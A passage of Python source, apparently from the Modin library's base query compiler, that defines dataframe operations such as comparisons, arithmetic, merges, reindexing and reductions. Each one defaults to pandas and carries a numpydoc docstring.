BinaryDefault.register(pandas.DataFrame.ge)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"greater than comparison\", sign=\">\", op_type=\"comparison\"\n )\n def gt(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.gt)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"less than or equal comparison\", sign=\"<=\", op_type=\"comparison\"\n )\n def le(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.le)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"less than comparison\", sign=\"<\", op_type=\"comparison\"\n )\n def lt(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.lt)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"modulo\", sign=\"%\")\n def mod(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.mod)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"multiplication\", sign=\"*\")\n def mul(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.mul)(self, other=other, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.corr\")\n def corr(self, **kwargs): # noqa: PR02\n \"\"\"\n Compute pairwise correlation of columns, excluding NA/null values.\n\n Parameters\n ----------\n method : {'pearson', 'kendall', 'spearman'} or callable(pandas.Series, pandas.Series) -> pandas.Series\n Correlation method.\n min_periods : int\n Minimum number of observations required per pair of columns\n to have a valid result. If fewer than `min_periods` non-NA values\n are present the result will be NA.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Correlation matrix.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.corr)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.cov\")\n def cov(self, **kwargs): # noqa: PR02\n \"\"\"\n Compute pairwise covariance of columns, excluding NA/null values.\n\n Parameters\n ----------\n min_periods : int\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Covariance matrix.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.cov)(self, **kwargs)\n\n def dot(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Compute the matrix multiplication of `self` and `other`.\n\n Parameters\n ----------\n other : BaseQueryCompiler or NumPy array\n The other query compiler or NumPy array to matrix multiply with `self`.\n squeeze_self : boolean\n If `self` is a one-column query compiler, indicates whether it represents Series object.\n squeeze_other : boolean\n If `other` is a one-column query compiler, indicates whether it represents Series object.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n A new query compiler that contains result of the matrix multiply.\n \"\"\"\n if kwargs.get(\"squeeze_self\", False):\n applyier = pandas.Series.dot\n else:\n applyier = pandas.DataFrame.dot\n return BinaryDefault.register(applyier)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"not equal comparison\", sign=\"!=\", op_type=\"comparison\"\n )\n def ne(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.ne)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"exponential power\", sign=\"**\")\n def pow(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.pow)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(\n operation=\"integer division\", sign=\"//\", self_on_right=True\n )\n def rfloordiv(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rfloordiv)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"modulo\", sign=\"%\", self_on_right=True)\n def rmod(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rmod)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"exponential power\", sign=\"**\", self_on_right=True\n )\n def rpow(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rpow)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"substraction\", sign=\"-\", self_on_right=True)\n def rsub(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rsub)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"division\", sign=\"/\", self_on_right=True)\n def rtruediv(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.rtruediv)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"substraction\", sign=\"-\")\n def sub(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.sub)(self, other=other, **kwargs)\n\n @doc_utils.doc_binary_method(operation=\"division\", sign=\"/\")\n def truediv(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.truediv)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"conjunction\", sign=\"&\", op_type=\"logical\")\n def __and__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__and__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"disjunction\", sign=\"|\", op_type=\"logical\")\n def __or__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__or__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"conjunction\", sign=\"&\", op_type=\"logical\", self_on_right=True\n )\n def __rand__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__rand__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"disjunction\", sign=\"|\", op_type=\"logical\", self_on_right=True\n )\n def __ror__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__ror__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(\n operation=\"exclusive or\", sign=\"^\", op_type=\"logical\", self_on_right=True\n )\n def __rxor__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__rxor__)(\n self, other=other, **kwargs\n )\n\n @doc_utils.doc_binary_method(operation=\"exclusive or\", sign=\"^\", op_type=\"logical\")\n def __xor__(self, other, **kwargs): # noqa: PR02\n return BinaryDefault.register(pandas.DataFrame.__xor__)(\n self, other=other, **kwargs\n )\n\n # FIXME: query compiler shoudln't care about differences between Frame and Series.\n # We should combine `df_update` and `series_update` into one method (Modin issue #3101).\n @doc_utils.add_refer_to(\"DataFrame.update\")\n def df_update(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Update values of `self` using non-NA values of `other` at the corresponding positions.\n\n If axes are not equal, perform frames alignment first.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n Frame to grab replacement values from.\n join : {\"left\"}\n Specify type of join to align frames if axes are not equal\n (note: currently only one type of join is implemented).\n overwrite : bool\n Whether to overwrite every corresponding value of self, or only if it's NAN.\n filter_func : callable(pandas.Series, pandas.Series) -> numpy.ndarray\n Function that takes column of the self and return bool mask for values, that\n should be overwriten in the self frame.\n errors : {\"raise\", \"ignore\"}\n If \"raise\", will raise a ``ValueError`` if `self` and `other` both contain\n non-NA data in the same place.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated values.\n \"\"\"\n return BinaryDefault.register(pandas.DataFrame.update, inplace=True)(\n self, other=other, **kwargs\n )\n\n @doc_utils.add_refer_to(\"Series.update\")\n def series_update(self, other, **kwargs): # noqa: PR02\n \"\"\"\n Update values of `self` using values of `other` at the corresponding indices.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n One-column query compiler with updated values.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated values.\n \"\"\"\n return BinaryDefault.register(pandas.Series.update, inplace=True)(\n self,\n other=other,\n squeeze_self=True,\n squeeze_other=True,\n **kwargs,\n )\n\n @doc_utils.add_refer_to(\"DataFrame.clip\")\n def clip(self, lower, upper, **kwargs): # noqa: PR02\n \"\"\"\n Trim values at input threshold.\n\n Parameters\n ----------\n lower : float or list-like\n upper : float or list-like\n axis : {0, 1}\n inplace : {False}\n This parameter serves the compatibility purpose. Always has to be False.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with values limited by the specified thresholds.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.clip)(\n self, lower=lower, upper=upper, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.where\")\n def where(self, cond, other, **kwargs): # noqa: PR02\n \"\"\"\n Update values of `self` using values from `other` at positions where `cond` is False.\n\n Parameters\n ----------\n cond : BaseQueryCompiler\n Boolean mask. True - keep the self value, False - replace by `other` value.\n other : BaseQueryCompiler or pandas.Series\n Object to grab replacement values from.\n axis : {0, 1}\n Axis to align frames along if axes of self, `cond` and `other` are not equal.\n 0 is for index, when 1 is for columns.\n level : int or label, optional\n Level of MultiIndex to align frames along if axes of self, `cond`\n and `other` are not equal. Currently `level` parameter is not implemented,\n so only None value is acceptable.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with updated data.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.where)(\n self, cond=cond, other=other, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.merge\")\n def merge(self, right, **kwargs): # noqa: PR02\n \"\"\"\n Merge QueryCompiler objects using a database-style join.\n\n Parameters\n ----------\n right : BaseQueryCompiler\n QueryCompiler of the right frame to merge with.\n how : {\"left\", \"right\", \"outer\", \"inner\", \"cross\"}\n on : label or list of such\n left_on : label or list of such\n right_on : label or list of such\n left_index : bool\n right_index : bool\n sort : bool\n suffixes : list-like\n copy : bool\n indicator : bool or str\n validate : str\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler that contains result of the merge.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.merge)(\n self, right=right, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.join\")\n def join(self, right, **kwargs): # noqa: PR02\n \"\"\"\n Join columns of another QueryCompiler.\n\n Parameters\n ----------\n right : BaseQueryCompiler\n QueryCompiler of the right frame to join with.\n on : label or list of such\n how : {\"left\", \"right\", \"outer\", \"inner\"}\n lsuffix : str\n rsuffix : str\n sort : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler that contains result of the join.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.join)(self, right, **kwargs)\n\n # END Abstract inter-data operations\n\n # Abstract Transpose\n def transpose(self, *args, **kwargs): # noqa: PR02\n \"\"\"\n Transpose this QueryCompiler.\n\n Parameters\n ----------\n copy : bool\n Whether to copy the data after transposing.\n *args : iterable\n Serves the compatibility purpose. Does not affect the result.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Transposed new QueryCompiler.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.transpose)(\n self, *args, **kwargs\n )\n\n def columnarize(self):\n \"\"\"\n Transpose this QueryCompiler if it has a single row but multiple columns.\n\n This method should be called for QueryCompilers representing a Series object,\n i.e. ``self.is_series_like()`` should be True.\n\n Returns\n -------\n BaseQueryCompiler\n Transposed new QueryCompiler or self.\n \"\"\"\n if len(self.columns) != 1 or (\n len(self.index) == 1 and self.index[0] == \"__reduced__\"\n ):\n return self.transpose()\n return self\n\n def is_series_like(self):\n \"\"\"\n Check whether this QueryCompiler can represent ``modin.pandas.Series`` object.\n\n Returns\n -------\n bool\n Return True if QueryCompiler has a single column or row, False otherwise.\n \"\"\"\n return len(self.columns) == 1 or len(self.index) == 1\n\n # END Abstract Transpose\n\n # Abstract reindex/reset_index (may shuffle data)\n @doc_utils.add_refer_to(\"DataFrame.reindex\")\n def reindex(self, axis, labels, **kwargs): # noqa: PR02\n \"\"\"\n Align QueryCompiler data with a new index along specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to align labels along. 0 is for index, 1 is for columns.\n labels : list-like\n Index-labels to align with.\n method : {None, \"backfill\"/\"bfill\", \"pad\"/\"ffill\", \"nearest\"}\n Method to use for filling holes in reindexed frame.\n fill_value : scalar\n Value to use for missing values in the resulted frame.\n limit : int\n tolerance : int\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with aligned axis.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.reindex)(\n self, axis=axis, labels=labels, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.reset_index\")\n def reset_index(self, **kwargs): # noqa: PR02\n \"\"\"\n Reset the index, or a level of it.\n\n Parameters\n ----------\n drop : bool\n Whether to drop the reset index or insert it at the beginning of the frame.\n level : int or label, optional\n Level to remove from index. Removes all levels by default.\n col_level : int or label\n If the columns have multiple levels, determines which level the labels\n are inserted into.\n col_fill : label\n If the columns have multiple levels, determines how the other levels\n are named.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with reset index.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.reset_index)(self, **kwargs)\n\n def set_index_from_columns(\n self, keys: List[Hashable], drop: bool = True, append: bool = False\n ):\n \"\"\"\n Create new row labels from a list of columns.\n\n Parameters\n ----------\n keys : list of hashable\n The list of column names that will become the new index.\n drop : bool, default: True\n Whether or not to drop the columns provided in the `keys` argument.\n append : bool, default: True\n Whether or not to add the columns in `keys` as new levels appended to the\n existing index.\n\n Returns\n -------\n BaseQueryCompiler\n A new QueryCompiler with updated index.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.set_index)(\n self, keys=keys, drop=drop, append=append\n )\n\n # END Abstract reindex/reset_index\n\n # Full Reduce operations\n #\n # These operations result in a reduced dimensionality of data.\n # Currently, this means a Pandas Series will be returned, but in the future\n # we will implement a Distributed Series, and this will be returned\n # instead.\n\n def is_monotonic_increasing(self):\n \"\"\"\n Return boolean if values in the object are monotonicly increasing.\n\n Returns\n -------\n bool\n \"\"\"\n return SeriesDefault.register(pandas.Series.is_monotonic_increasing)(self)\n\n def is_monotonic_decreasing(self):\n \"\"\"\n Return boolean if values in the object are monotonicly decreasing.\n\n Returns\n -------\n bool\n \"\"\"\n return SeriesDefault.register(pandas.Series.is_monotonic_decreasing)(self)\n\n @doc_utils.doc_reduce_agg(\n method=\"number of non-NaN values\", refer_to=\"count\", extra_params=[\"**kwargs\"]\n )\n def count(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.count)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"maximum value\", refer_to=\"max\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def max(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.max)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"mean value\", refer_to=\"mean\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def mean(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.mean)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"minimum value\", refer_to=\"min\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def min(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.min)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"production\",\n refer_to=\"prod\",\n extra_params=[\"**kwargs\"],\n params=\"axis : {0, 1}\",\n )\n def prod(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.prod)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"sum\",\n refer_to=\"sum\",\n extra_params=[\"**kwargs\"],\n params=\"axis : {0, 1}\",\n )\n def sum(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.sum)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"to_datetime\")\n def to_datetime(self, *args, **kwargs):\n \"\"\"\n Convert columns of the QueryCompiler to the datetime dtype.\n\n Parameters\n ----------\n *args : iterable\n **kwargs : dict\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with all columns converted to datetime dtype.\n \"\"\"\n return SeriesDefault.register(pandas.to_datetime)(self, *args, **kwargs)\n\n # END Abstract full Reduce operations\n\n # Abstract map partitions operations\n # These operations are operations that apply a function to every partition.\n def abs(self):\n \"\"\"\n Get absolute numeric value of each element.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with absolute numeric value of each element.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.abs)(self)\n\n def applymap(self, func):\n \"\"\"\n Apply passed function elementwise.\n\n Parameters\n ----------\n func : callable(scalar) -> scalar\n Function to apply to each element of the QueryCompiler.\n\n Returns\n -------\n BaseQueryCompiler\n Transformed QueryCompiler.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.applymap)(self, func=func)\n\n # FIXME: `**kwargs` which follows `numpy.conj` signature was inherited\n # from ``PandasQueryCompiler``, we should get rid of this dependency.\n # (Modin issue #3108)\n def conj(self, **kwargs):\n \"\"\"\n Get the complex conjugate for every element of self.\n\n Parameters\n ----------\n **kwargs : dict\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with conjugate applied element-wise.\n\n Notes\n -----\n Please refer to ``numpy.conj`` for parameters description.\n \"\"\"\n\n def conj(df, *args, **kwargs):\n return pandas.DataFrame(np.conj(df))\n\n return DataFrameDefault.register(conj)(self, **kwargs)\n\n # FIXME:\n # 1. This function takes Modin Series and DataFrames via `values` parameter,\n # we should avoid leaking of the high-level objects to the query compiler level.\n # (Modin issue #3106)\n # 2. Spread **kwargs into actual arguments (Modin issue #3108).\n def isin(self, **kwargs): # noqa: PR02\n \"\"\"\n Check for each element of `self` whether it's contained in passed `values`.\n\n Parameters\n ----------\n values : list-like, modin.pandas.Series, modin.pandas.DataFrame or dict\n Values to check elements of self in.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Boolean mask for self of whether an element at the corresponding\n position is contained in `values`.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.isin)(self, **kwargs)\n\n def isna(self):\n \"\"\"\n Check for each element of self whether it's NaN.\n\n Returns\n -------\n BaseQueryCompiler\n Boolean mask for self of whether an element at the corresponding\n position is NaN.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.isna)(self)\n\n # FIXME: this method is not supposed to take any parameters (Modin issue #3108).\n def negative(self, **kwargs):\n \"\"\"\n Change the sign for every value of self.\n\n Parameters\n ----------\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n\n Notes\n -----\n Be aware, that all QueryCompiler values have to be numeric.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.__neg__)(self, **kwargs)\n\n def notna(self):\n \"\"\"\n Check for each element of `self` whether it's existing (non-missing) value.\n\n Returns\n -------\n BaseQueryCompiler\n Boolean mask for `self` of whether an element at the corresponding\n position is not NaN.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.notna)(self)\n\n @doc_utils.add_refer_to(\"DataFrame.round\")\n def round(self, **kwargs): # noqa: PR02\n \"\"\"\n Round every numeric value up to specified number of decimals.\n\n Parameters\n ----------\n decimals : int or list-like\n Number of decimals to round each column to.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with rounded values.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.round)(self, **kwargs)\n\n # FIXME:\n # 1. high-level objects leaks to the query compiler (Modin issue #3106).\n # 2. remove `inplace` parameter.\n @doc_utils.add_refer_to(\"DataFrame.replace\")\n def replace(self, **kwargs): # noqa: PR02\n \"\"\"\n Replace values given in `to_replace` by `value`.\n\n Parameters\n ----------\n to_replace : scalar, list-like, regex, modin.pandas.Series, or None\n value : scalar, list-like, regex or dict\n inplace : {False}\n This parameter serves the compatibility purpose. Always has to be False.\n limit : int or None\n regex : bool or same types as `to_replace`\n method : {\"pad\", \"ffill\", \"bfill\", None}\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with all `to_replace` values replaced by `value`.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.replace)(self, **kwargs)\n\n @doc_utils.add_one_column_warning\n # FIXME: adding refer-to note will create two instances of the \"Notes\" section,\n # this breaks numpydoc style rules and also crashes the doc-style checker script.\n # For now manually added the refer-to message.\n # @doc_utils.add_refer_to(\"Series.view\")\n def series_view(self, **kwargs): # noqa: PR02\n \"\"\"\n Reinterpret underlying data with new dtype.\n\n Parameters\n ----------\n dtype : dtype\n Data type to reinterpret underlying data with.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler of the same data in memory, with reinterpreted values.\n\n Notes\n -----\n - Be aware, that if this method do fallback to pandas, then newly created\n QueryCompiler will be the copy of the original data.\n - Please refer to ``modin.pandas.Series.view`` for more information\n about parameters and output format.\n \"\"\"\n return SeriesDefault.register(pandas.Series.view)(self, **kwargs)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"to_numeric\")\n def to_numeric(self, *args, **kwargs): # noqa: PR02\n \"\"\"\n Convert underlying data to numeric dtype.\n\n Parameters\n ----------\n errors : {\"ignore\", \"raise\", \"coerce\"}\n downcast : {\"integer\", \"signed\", \"unsigned\", \"float\", None}\n *args : iterable\n Serves the compatibility purpose. Does not affect the result.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with converted to numeric values.\n \"\"\"\n return SeriesDefault.register(pandas.to_numeric)(self, *args, **kwargs)\n\n # FIXME: get rid of `**kwargs` parameter (Modin issue #3108).\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.unique\")\n def unique(self, **kwargs):\n \"\"\"\n Get unique values of `self`.\n\n Parameters\n ----------\n **kwargs : dict\n Serves compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with unique values.\n \"\"\"\n return SeriesDefault.register(pandas.Series.unique)(self, **kwargs)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.searchsorted\")\n def searchsorted(self, **kwargs): # noqa: PR02\n \"\"\"\n Find positions in a sorted `self` where `value` should be inserted to maintain order.\n\n Parameters\n ----------\n value : list-like\n side : {\"left\", \"right\"}\n sorter : list-like, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler which contains indices to insert.\n \"\"\"\n return SeriesDefault.register(pandas.Series.searchsorted)(self, **kwargs)\n\n # END Abstract map partitions operations\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.value_counts\")\n def value_counts(self, **kwargs): # noqa: PR02\n \"\"\"\n Count unique values of one-column `self`.\n\n Parameters\n ----------\n normalize : bool\n sort : bool\n ascending : bool\n bins : int, optional\n dropna : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler which index labels is a unique elements of `self`\n and each row contains the number of times corresponding value was met in the `self`.\n \"\"\"\n return SeriesDefault.register(pandas.Series.value_counts)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.stack\")\n def stack(self, level, dropna):\n \"\"\"\n Stack the prescribed level(s) from columns to index.\n\n Parameters\n ----------\n level : int or label\n dropna : bool\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.stack)(\n self, level=level, dropna=dropna\n )\n\n # Abstract map partitions across select indices\n def astype(self, col_dtypes, **kwargs): # noqa: PR02\n \"\"\"\n Convert columns dtypes to given dtypes.\n\n Parameters\n ----------\n col_dtypes : dict\n Map for column names and new dtypes.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated dtypes.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.astype)(\n self, dtype=col_dtypes, **kwargs\n )\n\n @property\n def dtypes(self):\n \"\"\"\n Get columns dtypes.\n\n Returns\n -------\n pandas.Series\n Series with dtypes of each column.\n \"\"\"\n return self.to_pandas().dtypes\n\n # END Abstract map partitions across select indices\n\n # Abstract column/row partitions reduce operations\n #\n # These operations result in a reduced dimensionality of data.\n # Currently, this means a Pandas Series will be returned, but in the future\n # we will implement a Distributed Series, and this will be returned\n # instead.\n\n # FIXME: we're handling level parameter at front-end, it shouldn't\n # propagate to the query compiler (Modin issue #3102)\n @doc_utils.add_refer_to(\"DataFrame.all\")\n def all(self, **kwargs): # noqa: PR02\n \"\"\"\n Return whether all the elements are true, potentially over an axis.\n\n Parameters\n ----------\n axis : {0, 1}, optional\n bool_only : bool, optional\n skipna : bool\n level : int or label\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n If axis was specified return one-column QueryCompiler with index labels\n of the specified axis, where each row contains boolean of whether all elements\n at the corresponding row or column are True. Otherwise return QueryCompiler\n with a single bool of whether all elements are True.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.all)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.any\")\n def any(self, **kwargs): # noqa: PR02\n \"\"\"\n Return whether any element is true, potentially over an axis.\n\n Parameters\n ----------\n axis : {0, 1}, optional\n bool_only : bool, optional\n skipna : bool\n level : int or label\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n If axis was specified return one-column QueryCompiler with index labels\n of the specified axis, where each row contains boolean of whether any element\n at the corresponding row or column is True. Otherwise return QueryCompiler\n with a single bool of whether any element is True.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.any)(self, **kwargs)\n\n def first_valid_index(self):\n \"\"\"\n Return index label of first non-NaN/NULL value.\n\n Returns\n -------\n scalar\n \"\"\"\n return (\n DataFrameDefault.register(pandas.DataFrame.first_valid_index)(self)\n .to_pandas()\n .squeeze()\n )\n\n @doc_utils.add_refer_to(\"DataFrame.idxmax\")\n def idxmax(self, **kwargs): # noqa: PR02\n \"\"\"\n Get position of the first occurence of the maximum for each row or column.\n\n Parameters\n ----------\n axis : {0, 1}\n skipna : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler with index labels of the specified axis,\n where each row contains position of the maximum element for the\n corresponding row or column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.idxmax)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.idxmin\")\n def idxmin(self, **kwargs): # noqa: PR02\n \"\"\"\n Get position of the first occurence of the minimum for each row or column.\n\n Parameters\n ----------\n axis : {0, 1}\n skipna : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler with index labels of the specified axis,\n where each row contains position of the minimum element for the\n corresponding row or column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.idxmin)(self, **kwargs)\n\n def last_valid_index(self):\n \"\"\"\n Return index label of last non-NaN/NULL value.\n\n Returns\n -------\n scalar\n \"\"\"\n return (\n DataFrameDefault.register(pandas.DataFrame.last_valid_index)(self)\n .to_pandas()\n .squeeze()\n )\n\n @doc_utils.doc_reduce_agg(\n method=\"median value\", refer_to=\"median\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def median(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.median)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.memory_usage\")\n def memory_usage(self, **kwargs): # noqa: PR02\n \"\"\"\n Return the memory usage of each column in bytes.\n\n Parameters\n ----------\n index : bool\n deep : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler with index labels of `self`, where each row\n contains the memory usage for the corresponding column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.memory_usage)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"number of unique values\",\n refer_to=\"nunique\",\n params=\"\"\"\n axis : {0, 1}\n dropna : bool\"\"\",\n extra_params=[\"**kwargs\"],\n )\n def nunique(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.nunique)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"value at the given quantile\",\n refer_to=\"quantile\",\n params=\"\"\"\n q : float\n axis : {0, 1}\n numeric_only : bool\n interpolation : {\"linear\", \"lower\", \"higher\", \"midpoint\", \"nearest\"}\"\"\",\n extra_params=[\"**kwargs\"],\n )\n def quantile_for_single_value(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.quantile)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"unbiased skew\", refer_to=\"skew\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def skew(self, 